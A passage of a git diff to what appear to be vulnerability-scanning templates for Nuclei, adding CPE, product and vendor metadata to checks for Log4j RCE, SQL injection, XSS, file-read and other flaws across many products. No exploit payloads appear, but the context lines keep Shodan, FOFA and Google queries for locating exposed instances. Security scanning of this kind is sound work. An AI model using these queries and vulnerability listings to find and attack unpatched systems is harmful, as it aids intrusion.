\ No newline at end of file
+# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml
index 46103b2dc7..6aeb5f7b9e 100644
--- a/http/vulnerabilities/other/nextjs-redirect.yaml
+++ b/http/vulnerabilities/other/nextjs-redirect.yaml
@@ -13,9 +13,12 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-601
+ cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"/_next/static"
+ product: next.js
+ vendor: zeit
tags: redirect,nextjs,xss
http:
@@ -33,4 +36,4 @@ http:
- type: status
status:
- 308
-# digest: 4a0a0047304502205cea4e717c7c2a70efdf78bbfdc71c7003cd0e55f055d264c130cd4adf52bf1e022100e235d5d012538e5f42ebf9eb3091963591b6fc3ac472866adcf48c7d07fc469f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205cea4e717c7c2a70efdf78bbfdc71c7003cd0e55f055d264c130cd4adf52bf1e022100e235d5d012538e5f42ebf9eb3091963591b6fc3ac472866adcf48c7d07fc469f:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/ns-asg-file-read.yaml b/http/vulnerabilities/other/ns-asg-file-read.yaml
index e5ce7500fe..6526589ff1 100644
--- a/http/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/http/vulnerabilities/other/ns-asg-file-read.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:h:netentsec:ns-asg:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:“NS-ASG”
fofa-query: app="网康科技-NS-ASG安全网关"
+ product: ns-asg
+ vendor: netentsec
tags: nsasg,lfi
http:
diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml
index da09428ffe..80e8ecf99f 100644
--- a/http/vulnerabilities/other/opencart-core-sqli.yaml
+++ b/http/vulnerabilities/other/opencart-core-sqli.yaml
@@ -13,7 +13,11 @@ info:
max-request: 2
shodan-query: title:"OpenCart"
fofa-query: icon_hash="-1443008128"
+ product: opencart
+ vendor: opencart
tags: opencart,sqli
+ classification:
+ cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
@@ -42,4 +46,4 @@ http:
- 'contains(body, "Nabb ")'
- 'status_code == 200'
condition: and
-# digest: 490a0046304402201bc18f2d15407b5b4d1feec79ec26ec5154c26a4d9bc4a18c47806e834d9a27402207fca97036f9cdf832180fe615db49a2c59459c5752bd17ae36029cd5d8ecb6af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201bc18f2d15407b5b4d1feec79ec26ec5154c26a4d9bc4a18c47806e834d9a27402207fca97036f9cdf832180fe615db49a2c59459c5752bd17ae36029cd5d8ecb6af:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/opencti-lfi.yaml b/http/vulnerabilities/other/opencti-lfi.yaml
index add781c0dc..01de7548e0 100644
--- a/http/vulnerabilities/other/opencti-lfi.yaml
+++ b/http/vulnerabilities/other/opencti-lfi.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"OpenCTI"
+ product: opencti
+ vendor: citeum
tags: opencti,lfi,oss
http:
diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
index d580373f8c..7988b3dbb3 100644
--- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
+++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
@@ -16,10 +16,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:opennms:horizon:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"OpenNMS Web Console"
+ product: horizon
+ vendor: opennms
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/openshift-log4j-rce.yaml b/http/vulnerabilities/other/openshift-log4j-rce.yaml
index 06b115ee26..4d09c11a6d 100644
--- a/http/vulnerabilities/other/openshift-log4j-rce.yaml
+++ b/http/vulnerabilities/other/openshift-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:redhat:openshift_origin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"OpenShift"
+ product: openshift_origin
+ vendor: redhat
tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/opensis-lfi.yaml b/http/vulnerabilities/other/opensis-lfi.yaml
index 22b050e4b2..7e1a9e01a1 100644
--- a/http/vulnerabilities/other/opensis-lfi.yaml
+++ b/http/vulnerabilities/other/opensis-lfi.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"openSIS"
+ product: opensis
+ vendor: os4ed
tags: opensis,lfi,edb
http:
diff --git a/http/vulnerabilities/other/papercut-log4j-rce.yaml b/http/vulnerabilities/other/papercut-log4j-rce.yaml
index 2665b9e720..238a76e641 100644
--- a/http/vulnerabilities/other/papercut-log4j-rce.yaml
+++ b/http/vulnerabilities/other/papercut-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Papercut"
+ product: papercut_mf
+ vendor: papercut
tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/parallels-hsphere-xss.yaml b/http/vulnerabilities/other/parallels-hsphere-xss.yaml
index 8dec3f5210..8d92be06fc 100644
--- a/http/vulnerabilities/other/parallels-hsphere-xss.yaml
+++ b/http/vulnerabilities/other/parallels-hsphere-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:parallels:h-sphere:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"h-sphere"
+ product: h-sphere
+ vendor: parallels
tags: hsphere,xss,edb,parallels
http:
diff --git a/http/vulnerabilities/other/pega-log4j-rce.yaml b/http/vulnerabilities/other/pega-log4j-rce.yaml
index 253aa4cbd3..0765ab3541 100644
--- a/http/vulnerabilities/other/pega-log4j-rce.yaml
+++ b/http/vulnerabilities/other/pega-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:pega:platform:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: title:"Pega"
+ product: platform
+ vendor: pega
tags: cve,cve2021,rce,jndi,log4j,pega,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml
index e97ef38cbd..93953b3839 100644
--- a/http/vulnerabilities/other/phpldapadmin-xss.yaml
+++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 9
shodan-query: html:"phpLDAPadmin"
+ product: phpldapadmin
+ vendor: phpldapadmin_project
tags: php,phpldapadmin,xss
+ classification:
+ cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/phpok-sqli.yaml b/http/vulnerabilities/other/phpok-sqli.yaml
index 5418e8dfc4..612a22d4de 100644
--- a/http/vulnerabilities/other/phpok-sqli.yaml
+++ b/http/vulnerabilities/other/phpok-sqli.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:phpok:phpok:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="phpok"
+ product: phpok
+ vendor: phpok
tags: phpok,sqli
variables:
num: "999999999"
diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml
index b9640c6324..22f85898de 100644
--- a/http/vulnerabilities/other/quick-cms-sqli.yaml
+++ b/http/vulnerabilities/other/quick-cms-sqli.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: body="Quick.Cms v6.7"
+ product: quick.cms
+ vendor: opensolution
tags: packetstorm,quickcms,sqli,cms
+ classification:
+ cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -39,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml
index 164927a319..7ba9bec298 100644
--- a/http/vulnerabilities/other/rconfig-file-upload.yaml
+++ b/http/vulnerabilities/other/rconfig-file-upload.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
+ cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"rConfig"
+ product: rconfig
+ vendor: rconfig
tags: rconfig,rce,edb,file-upload,instrusive,intrusive
http:
diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml
index 47cd914830..02c6ddf7d7 100644
--- a/http/vulnerabilities/other/rundeck-log4j.yaml
+++ b/http/vulnerabilities/other/rundeck-log4j.yaml
@@ -14,10 +14,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Rundeck"
+ product: rundeck
+ vendor: pagerduty
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/seeyon-oa-log4j.yaml b/http/vulnerabilities/other/seeyon-oa-log4j.yaml
index d61b982697..1233e2db17 100755
--- a/http/vulnerabilities/other/seeyon-oa-log4j.yaml
+++ b/http/vulnerabilities/other/seeyon-oa-log4j.yaml
@@ -15,10 +15,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="致远互联-OA"
+ product: log4j
+ vendor: apache
tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast
http:
diff --git a/http/vulnerabilities/other/sharp-printers-lfi.yaml b/http/vulnerabilities/other/sharp-printers-lfi.yaml
index a618833424..e723bf4250 100644
--- a/http/vulnerabilities/other/sharp-printers-lfi.yaml
+++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml
@@ -16,8 +16,12 @@ info:
verified: true
max-request: 1
shodan-query: "Set-Cookie: MFPSESSIONID="
+ product: mx-3050v_firmware
+ vendor: sharp
tags: sharp,printer,lfi
+ classification:
+ cpe: cpe:2.3:o:sharp:mx-3050v_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/siteminder-dom-xss.yaml b/http/vulnerabilities/other/siteminder-dom-xss.yaml
index bc01fa560a..b483e8db5d 100644
--- a/http/vulnerabilities/other/siteminder-dom-xss.yaml
+++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:broadcom:siteminder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
google-query: inurl:"smpwservices.fcc"
+ product: siteminder
+ vendor: broadcom
tags: dom,xss,siteminder
http:
diff --git a/http/vulnerabilities/other/slims-xss.yaml b/http/vulnerabilities/other/slims-xss.yaml
index 0dc349a182..b13760eae3 100644
--- a/http/vulnerabilities/other/slims-xss.yaml
+++ b/http/vulnerabilities/other/slims-xss.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"SLIMS"
+ product: senayan_library_management_system
+ vendor: slims
tags: senayan,packetstorm,xss,slims
+ classification:
+ cpe: cpe:2.3:a:slims:senayan_library_management_system:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
index b9ac4253b1..16b3e48dfe 100644
--- a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
+++ b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
@@ -12,9 +12,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:softneta:meddream_pacs:*:*:*:*:*:*:*:*
metadata:
max-request: 1
google-query: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+ product: meddream_pacs
+ vendor: softneta
tags: sofneta,lfi,edb
http:
diff --git a/http/vulnerabilities/other/solarview-compact-xss.yaml b/http/vulnerabilities/other/solarview-compact-xss.yaml
index 3d6d0dcc76..e832eaa3f1 100644
--- a/http/vulnerabilities/other/solarview-compact-xss.yaml
+++ b/http/vulnerabilities/other/solarview-compact-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:h:contec:solarview_compact:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"SolarView Compact"
+ product: solarview_compact
+ vendor: contec
tags: xss,solarview,edb
http:
diff --git a/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml b/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml
index 68da0ef778..5180e81e50 100644
--- a/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml
+++ b/http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"SonicWall Network Security"
+ product: network_security_manager
+ vendor: sonicwall
tags: cve,cve2021,rce,jndi,log4j,sonicwall,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml b/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml
index cdadf5a9cd..1e479fbe98 100644
--- a/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml
+++ b/http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"Login - Splunk"
+ product: splunk
+ vendor: splunk
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/steve-xss.yaml b/http/vulnerabilities/other/steve-xss.yaml
index e405f56232..9f9e8959d8 100644
--- a/http/vulnerabilities/other/steve-xss.yaml
+++ b/http/vulnerabilities/other/steve-xss.yaml
@@ -12,11 +12,14 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:steve-community:steve:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
google-query: intitle:"SteVe - Steckdosenverwaltung"
+ product: steve
+ vendor: steve-community
tags: steve,xss,oss
http:
diff --git a/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml b/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml
index 2c06ac05f8..ff4c4c1e86 100644
--- a/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml
+++ b/http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:symantec:endpoint_protection_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Symantec Endpoint Protection Manager"
+ product: endpoint_protection_manager
+ vendor: symantec
tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/tamronos-rce.yaml b/http/vulnerabilities/other/tamronos-rce.yaml
index bbda944af1..295616cbab 100644
--- a/http/vulnerabilities/other/tamronos-rce.yaml
+++ b/http/vulnerabilities/other/tamronos-rce.yaml
@@ -12,11 +12,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-78
+ cpe: cpe:2.3:o:tamronos:tamronos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"TamronOS IPTV系统"
fofa-query: title="TamronOS IPTV系统"
+ product: tamronos
+ vendor: tamronos
tags: tamronos,rce
http:
diff --git a/http/vulnerabilities/other/tekon-info-leak.yaml b/http/vulnerabilities/other/tekon-info-leak.yaml
index f9d53707f6..c84e491059 100644
--- a/http/vulnerabilities/other/tekon-info-leak.yaml
+++ b/http/vulnerabilities/other/tekon-info-leak.yaml
@@ -10,8 +10,12 @@ info:
metadata:
max-request: 1
shodan-query: title:"контроллер"
+ product: kio_firmware
+ vendor: tekon
tags: tekon,exposure,unauth
+ classification:
+ cpe: cpe:2.3:o:tekon:kio_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml
index 0ca0f0edf6..ddb6e9ecc7 100644
--- a/http/vulnerabilities/other/tendat-credential.yaml
+++ b/http/vulnerabilities/other/tendat-credential.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\""
+ product: g0
+ vendor: tendacn
tags: tendat,exposure,config
+ classification:
+ cpe: cpe:2.3:h:tendacn:g0:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -27,4 +31,4 @@ http:
- 'contains(header, "config/conf")'
- 'status_code == 200'
condition: and
-# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/thruk-xss.yaml b/http/vulnerabilities/other/thruk-xss.yaml
index e1f3cc02b6..457010c7ac 100644
--- a/http/vulnerabilities/other/thruk-xss.yaml
+++ b/http/vulnerabilities/other/thruk-xss.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:thruk:thruk:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Thruk"
+ product: thruk
+ vendor: thruk
tags: thruk,xss
http:
diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml
index f13b08af63..523c3ee2b3 100644
--- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml
+++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml
@@ -16,10 +16,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:ui:unifi_network_application:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"UniFi Network"
+ product: unifi_network_application
+ vendor: ui
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml
index 43cb0acb3c..9d3b9c02a1 100644
--- a/http/vulnerabilities/other/ups-network-lfi.yaml
+++ b/http/vulnerabilities/other/ups-network-lfi.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"UPS Network Management Card 4"
+ product: netman_204_firmware
+ vendor: riello-ups
tags: packetstorm,ups,lfi
+ classification:
+ cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/voyager-lfi.yaml b/http/vulnerabilities/other/voyager-lfi.yaml
index fbf986a2c5..e67f649502 100644
--- a/http/vulnerabilities/other/voyager-lfi.yaml
+++ b/http/vulnerabilities/other/voyager-lfi.yaml
@@ -11,10 +11,13 @@ info:
classification:
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:voyager_project:voyager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"voyager-assets"
+ product: voyager
+ vendor: voyager_project
tags: voyager,lfi
http:
@@ -37,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c63eefb35a033aa410140b8eb0a820269dd7636f950a8aae7994097a70e80d4c022100eb475dc522e4fb6af94961188a91347ecab596501025105354698b295c16e85d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c63eefb35a033aa410140b8eb0a820269dd7636f950a8aae7994097a70e80d4c022100eb475dc522e4fb6af94961188a91347ecab596501025105354698b295c16e85d:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/wapples-firewall-lfi.yaml b/http/vulnerabilities/other/wapples-firewall-lfi.yaml
index bb64882e83..64eaa3c065 100644
--- a/http/vulnerabilities/other/wapples-firewall-lfi.yaml
+++ b/http/vulnerabilities/other/wapples-firewall-lfi.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.title:"Intelligent WAPPLES"
+ product: wapples
+ vendor: pentasecurity
tags: wapples,firewall,lfi,authenticated
http:
diff --git a/http/vulnerabilities/other/webpagetest-ssrf.yaml b/http/vulnerabilities/other/webpagetest-ssrf.yaml
index 1bd64ad51a..695e3c1af2 100644
--- a/http/vulnerabilities/other/webpagetest-ssrf.yaml
+++ b/http/vulnerabilities/other/webpagetest-ssrf.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"WebPageTest"
+ product: webpagetest
+ vendor: webpagetest
tags: ssrf,webpagetest,oast
+ classification:
+ cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +33,4 @@ http:
part: interactsh_protocol
words:
- "http"
-# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/wuzhicms-sqli.yaml b/http/vulnerabilities/other/wuzhicms-sqli.yaml
index 9db01f372c..fef83e75f0 100644
--- a/http/vulnerabilities/other/wuzhicms-sqli.yaml
+++ b/http/vulnerabilities/other/wuzhicms-sqli.yaml
@@ -13,11 +13,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:wuzhicms:wuzhicms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Wuzhicms"
fofa-query: title="Wuzhicms"
+ product: wuzhicms
+ vendor: wuzhicms
tags: wuzhicms,sqli
variables:
num: "999999999"
diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml
index 6305003847..f7bba06124 100644
--- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml
+++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml
@@ -12,10 +12,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-502
+ cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"XenMobile"
+ product: xenmobile_server
+ vendor: citrix
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/xxljob-executor-unauth.yaml b/http/vulnerabilities/other/xxljob-executor-unauth.yaml
index 772187d123..cec0ef4ec6 100644
